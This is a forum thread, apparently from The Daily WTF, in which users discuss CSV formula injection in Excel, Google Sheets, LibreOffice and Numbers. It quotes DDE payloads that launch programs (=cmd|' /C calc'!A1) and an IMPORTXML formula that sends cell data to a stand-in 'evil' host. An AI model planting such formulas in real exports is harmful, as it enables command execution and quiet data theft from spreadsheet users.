More Excelence in spreadsheet-land


  • Impossible Mission - B


  • And then the murders began.

    As if I needed more reasons to hate Excel.



  • Excel runs scripts after users clicks "Allow". News at 11!

    More seriously, we make use of this stupidity in Excel when users want to export from our system so that they can see the underlying formulas and edit them after the export. I'm sure lots of other tricks could be done to access data from the target computer using formulas (like injecting VB script?).

    The whole idea that Excel tries to guess what to do with the data (and is annoyingly wrong sometimes) is typical Microsoft crap.



  • @unperverted-vixen said in More Excelence in spreadsheet-land:

    As if I needed more reasons to hate Excel.

    I'd like to point out that the second part demonstrates the same thing for Google Sheets. And I'd be surprised if LibreOffice didn't have similar shenanigans going on.


  • And then the murders began.

    @rhywden Okay, Excel's not the only offender. It's just the one I actually use. :p


  • Notification Spam Recipient

    @unperverted-vixen said in More Excelence in spreadsheet-land:

    @rhywden Okay, Excel's not the only offender. It's just the one I actually use. :p

    And you pay (plenty) for it, so it's sane for you to actively expect it to not be shit.



  • Don't worry, Excel solves that by being incompatible with most CSV files.



  • Even without the security risk this is a bug that mangles data.

    I have to work with a lot of grubby records exported as text or as spreadsheets. By the time I get to see them they're often full of '#name?' values as text. Somewhere along the line a user innocently wrote an entry that began with an '='. If that flat-file ever gets anywhere near Excel then it will try, and fail, to interpret the text as a formula. Once the data is re-exported to text all that's left is the useless error message ghost. I see hundreds of entries like this.

    I know the work-flow is broken, but in many cases the data files have been sitting around for years - the originals are long gone. I can't disabuse my users of the notion that Excel is a good way to view and edit csv files.

    Don't get me started on the way Excel mangles dates (and anything that looks even slightly like a date)

    🍊



  • @japonicus said in More Excelence in spreadsheet-land:

    I can't disabuse my users of the notion that Excel is a good way to view and edit csv files.

    Maybe use the trick described in OP to show a warning that it's not to be opened with Excel? Preferably clearing all other content of the file.



  • Wow. Okay, while I had no idea that something like =cmd|' /C calc'!A1 would actually try to launch cmd.exe with those arguments, it does at least say that:

    0_1507939397938_23e07af0-3f1f-4e87-9cd0-e537159d12ce-image.png

    I sure as hell am not going to click "Yes" when a workbook unexpectedly prompts me to allow it to "Start application 'CMD.EXE'?". And yeah, it does successfully launch Calculator if I do click "Yes".


  • Impossible Mission Players - A

    @anotherusername said in More Excelence in spreadsheet-land:

    Wow. Okay, while I had no idea that something like =cmd|' /C calc'!A1 would actually try to launch cmd.exe with those arguments, it does at least say that:

    0_1507939397938_23e07af0-3f1f-4e87-9cd0-e537159d12ce-image.png

    I sure as hell am not going to click "Yes" when a workbook unexpectedly prompts me to allow it to "Start application 'CMD.EXE'?". And yeah, it does successfully launch Calculator if I do click "Yes".

    I'm just floored that that's actually a thing you can do in Excel. Like, what??? You literally baked arbitrary code execution into a data format! Who approved this?!?!

    It was because OLE was too hard, wasn't it?

    Linux devs would be proud....



  • @tsaukpaetra said in More Excelence in spreadsheet-land:

    I'm just floored that that's actually a thing you can do in Excel. Like, what??? You literally baked arbitrary code execution into a data format! Who approved this?!?!

    Someone decades ago when security was very low on the list of concerns.



  • @tsaukpaetra 🤦 it doesn't even need to be cmd. Any application name can be given, and the arguments don't even need to be anything in particular (they're required to be something, though):

    =calc|a!a

    Know what's even more awesome? Just pasting that into Excel is enough to cause it to try to run. Although, it apparently has to be plain text on the clipboard, so copying it from here won't work. Copy from here and paste it into Notepad (or any plain-text field... pasting it into the web console will also work); then copy it from that and paste it into Excel.


  • Impossible Mission - B

    @anotherusername said in More Excelence in spreadsheet-land:

    Know what's even more awesome? Just pasting that into Excel is enough to cause it to try to run. Although, it apparently has to be plain text on the clipboard, so copying it from here won't work. Copy from here and paste it into Notepad (or any plain-text field... pasting it into the web console will also work); then copy it from that and paste it into Excel.



  • undefined ^ ∞



  • @pie_flavor said in More Excelence in spreadsheet-land:

    @unperverted-vixen said in More Excelence in spreadsheet-land:

    @rhywden Okay, Excel's not the only offender. It's just the one I actually use. :p

    And you pay (plenty) for it, so it's sane for you to actively expect it to not be shit.

    Only aliens who arrived on this planet this week would have that expectation. And maybe my nana who still thinks computers are a fad.


  • And then the murders began.

    @anotherusername said in More Excelence in spreadsheet-land:

    Copy from here and paste it into Notepad (or any plain-text field... pasting it into the web console will also work); then copy it from that and paste it into Excel.

    Why bother breaking out the console? There's a perfectly good address bar right in my browser!


  • Discourse touched me in a no-no place

    @anonymous234 said in More Excelence in spreadsheet-land:

    Someone decades ago when security was very low on the list of concerns.

    The terrifying thing is that this sort of idiotic misinterpretation thing is probably being relied upon by a great many businesses' everyday business spreadsheets, so MS don't dare fix it properly.


  • Notification Spam Recipient

    @dkf said in More Excelence in spreadsheet-land:

    @anonymous234 said in More Excelence in spreadsheet-land:

    Someone decades ago when security was very low on the list of concerns.

    The terrifying thing is that this sort of idiotic misinterpretation thing is probably being relied upon by a great many businesses' everyday business spreadsheets, so MS don't dare fix it properly.

    Copy of Copy of Copy of test_spreadsheet (2) (3) (Copy) (Copy) [DO NOT EDIT OR THE DATABASE DELETES ITSELF].xlsx.xls.xlsx



  • @rhywden said in More Excelence in spreadsheet-land:

    I'd like to point out that the second part demonstrates the same thing for Google Sheets. And I'd be surprised if LibreOffice didn't have similar shenanigans going on.

    It doesn’t:

    Foo,Bar
    1,"=1+2”
    

    when imported gives:

    0_1507972583087_Schermafbeelding 2017-10-14 om 11.16.15.png

    But then it does anyway:

    0_1507972616063_Schermafbeelding 2017-10-14 om 11.16.33.png

    You can avoid it by checking the “Quoted field as text” box, but that requires conscious effort.

    Though I’m happy to report that Numbers (the spreadsheet I normally use) doesn’t suffer from this:

    0_1507972341701_Schermafbeelding 2017-10-14 om 11.11.42.png

    Editing the cell with the calculation does cause it to be executed, though, because at that point it sees the = and decides to interpret it as a formula.



  • @gurth When you import it THAT way then Excel will not do this as well.

    The article is about autoimport, i.e. doubleclick on a .csv and letting the default program do its work.



  • @dkf said in More Excelence in spreadsheet-land:

    The terrifying thing is that this sort of idiotic misinterpretation thing is probably being relied upon by a great many businesses' everyday business spreadsheets, so MS don't dare fix it properly.

    Doesn't that go for pretty much the entirety of the Microsoft product catalog, which is a key reason for their software being horribly bloated and broken?



  • @unperverted-vixen said in More Excelence in spreadsheet-land:

    @anotherusername said in More Excelence in spreadsheet-land:

    Copy from here and paste it into Notepad (or any plain-text field... pasting it into the web console will also work); then copy it from that and paste it into Excel.

    Why bother breaking out the console? There's a perfectly good address bar right in my browser!

    For all I know, copying from the address bar includes a "web uri" data type and that causes it not to work.

    Although, I get the impression that maybe you tried it and it did work, and I'm on mobile so I can't test it either way.


  • And then the murders began.

    @anotherusername Not this specifically, but I will routinely paste into my address bar to strip formatting before pasting into emails or JIRA...



  • @unperverted-vixen it does work.



  • @rhywden said in More Excelence in spreadsheet-land:

    @gurth When you import it THAT way then Excel will not do this as well.

    The article is about autoimport, i.e. doubleclick on a .csv and letting the default program do its work.

    I dragged-and-dropped the CSV file onto the LibreOffice and Numbers icons and let them import it. If this causes different behaviour than double-clicking the file does, then there’s far more undefinedery going on. But let me test it for you …

    As I thought: if I set LibreOffice as the default program to open my CSV test file with, then double-click that file, LibreOffice pops up the same dialog as I included a screenshot of above.

    Trying it with Excel 2008 (the newest I have), I don’t get an import dialog but it does execute the formula. Opening the CSV file by the File → Open menu, it does the exact same thing.



  • @gurth I just tried it in Excel 2016.

    Ribbon menu => Data => From csv or text

    yields:

    0_1508061650384_0b60fdd5-6483-4dd0-95ca-95f8902fa4e5-image.png



  • @rhywden If I try that method in Excel 2008 (well, import from text file, as there’s no import from CSV, but choosing text file also allows a CSV file to be selected), it does show an import dialog. The only way I can get it to import the =1+2 cell as showing that instead of as 3 is if I go to step 3 of the text import wizard and indicate there that the column it’s in, should be imported as text instead of as the default cell type.

    IOW: it seems they improved that part of Excel at least since 2008.


  • area_can

    @quijibo said in More Excelence in spreadsheet-land:

    Excel runs scripts after users clicks "Allow". News at 11!

    Excel also performs HTTP requests without any confirmation:

    2,2017-07-25,Important Client,"=IMPORTXML(CONCAT(""http://some-server-with-log.evil?v="", CONCATENATE(A2:E2)), ""//a"")",240

    The attacker starts the cell with their trusty = symbol prefix and then points IMPORTXML to a server they control, appending as a querystring of spreadsheet data. Now they can open up their server log and bam! Data that isn’t theirs. Try it yourself with a Requestb.in.

    The ultra sinister thing here? No warnings, no popups, no reason to think that anything is amiss. The attacker just enters a similarly formatted time/issue/whatever entry, eventually an administrator attempts to view a CSV export and all that limited-access data is immediately, and quietly sent away.

    and with google sheets, you can pull in other sheets data:

    And this is Google Sheets - Sheets are not limited to just their own data, in fact they can pull in data from other spreadsheets that the user has access to. All that an attacker has to know is the other sheet’s id. That information isn’t usually considered secret; it appears in the spreadsheet urls, and will often be accidentally emailed, or posted in intra-company documentation, relying on Google’s security to ensure only authorized users access that data.



  • @atazhaia said in More Excelence in spreadsheet-land:

    @dkf said in More Excelence in spreadsheet-land:

    The terrifying thing is that this sort of idiotic misinterpretation thing is probably being relied upon by a great many businesses' everyday business spreadsheets, so MS don't dare fix it properly.

    Doesn't that go for pretty much the entirety of the Microsoft product catalog, which is a key reason for their software being horribly bloated and broken?

    It goes for pretty much everything in computers. Makefiles, anyone?



  • @scholrlea said in More Excelence in spreadsheet-land:

    Makefiles, anyone?

    Please, not makefiles! Have mercy upon me!



  • @bb36e said in More Excelence in spreadsheet-land:

    @quijibo said in More Excelence in spreadsheet-land:

    Excel runs scripts after users clicks "Allow". News at 11!

    Excel also performs HTTP requests without any confirmation:

    ...

    No, it does not. Excel 2010 does not support IMPORTXML and the article only talks about Google Sheets. If Excel does support some method for doing HTTP requests, my guess is that it would either prompt to run scripts when you open the file, or prompt about a cross-site request (local file loading from the web) before it makes the request.

    From the article:

    Well recall that while we cannot run macros in Google Sheets, we can absolutely run formulas. And formulas don’t have to be limited to simple arithmetic. In fact, are there any Google Sheets commands available in formulas that can send data elsewhere? Why yes, there seem to be quite a few. But lets take a look at IMPORTXML in particular.

    I already feel dirty for defending Microsoft, but let's not spread misinformation.



  • This post is deleted!


  • @quijibo

    @quijibo said in More Excelence in spreadsheet-land:

    Excel 2010 does not support IMPORTXML

    ⭕

    @quijibo said in More Excelence in spreadsheet-land:

    it would either prompt to run scripts when you open the file, or prompt about a cross-site request (local file loading from the web) before it makes the request.

    ❌


  • Discourse touched me in a no-no place

    @scholrlea said in More Excelence in spreadsheet-land:

    Makefiles, anyone?

    Do those makefiles include macros in them that dynamically create makefile rules? I hate those; they're so hard to debug…



  • I feel like the article is silly, in the sense that this is not so much a vulnerability as it is a misunderstanding of what your tools do. CSV is a perfectly inert format, and any program that displays csv files should not present a danger when inspecting any csv file. But Excel does not display csv files, it imports them. Importing, in every program, means converting something from a format it can't use into a format it can. Since Excel executes things, it is to be expected that imported things can be executed. After all, if you had a sheet that executed things and you exported it to csv, you would expect Excel to re-execute those same things when you import that exported sheet.

    Thinking "I don't know that there's anything dangerous in this unknown file, thus it can't possibly have anything dangerous" is a vulnerability in people, not software. The software can't protect you if you think that way, because you're going to just ignore every warning that pops up anyway.



  • @dkf said in More Excelence in spreadsheet-land:

    @scholrlea said in More Excelence in spreadsheet-land:

    Makefiles, anyone?

    Do those makefiles include macros in them that dynamically create makefile rules? I hate those; they're so hard to debug…

    Well, yeah, that's a pile of undefined in it's own right to be sure, but I was referring to the 'required leading tabs' horseshit. Supposedly, the original developer of make noticed the problem early on, but decided that he didn't want to risk fixing it because he had a whole ten users already and he didn't want to break their existing scripts.

    It is worth bearing in mind that he never expected to have many more users, because Unix was some obscure thing that was thrown together on a lark and would never get used outside of Bell Labs. He just didn't see it as mattering, because it would be replaced in a few months time anyway - his cobbled-together copy of a relatively minor Tenex utility just wasn't important enough to piss of those ten guys down the hall.


Log in to reply
 

Looks like your connection to What the Daily WTF? was lost, please wait while we try to reconnect.